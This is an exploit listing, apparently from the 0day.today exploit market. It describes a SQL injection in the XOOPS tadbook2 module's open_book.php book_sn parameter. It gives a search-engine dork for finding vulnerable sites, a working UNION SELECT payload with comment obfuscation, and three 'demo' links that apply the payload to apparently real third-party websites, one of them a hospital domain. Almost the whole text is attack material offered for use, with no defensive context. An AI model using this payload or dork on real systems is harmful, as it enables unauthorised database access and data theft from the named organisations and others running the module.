[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln

Author
stylextra
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4634
Category
web applications
Date add
11-01-2009
Platform
unsorted
================================================================
XOOPS Module tadbook2 (open_book.php book_sn) SQL Injection Vuln
================================================================


##########################################
# XOOPS Module:  tadbook2
##########################################
##AUTHOR : Stylextra
###########################################
# DORKS : dork: /modules/tadbook2/open_book.php?book_sn=
###########################################
 
target: scriptpage.com/modules/tadbook2/open_book.php?book_sn=[sql Code]
 
Sql code: -99/**/union/**/select/**/version(),2/*
 
live link: http://xxx.com/modules/tadbook2/open_book.php?book_sn=-99/**/union/**/select/**/version(),2/*
 
demo1 : http://pr.hosp.ncku.edu.tw/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
 
demo2 : http://www.off.tw/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
 
demo3 : http://www.taot.org.tw/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*



#  0day.today [2024-11-15]  #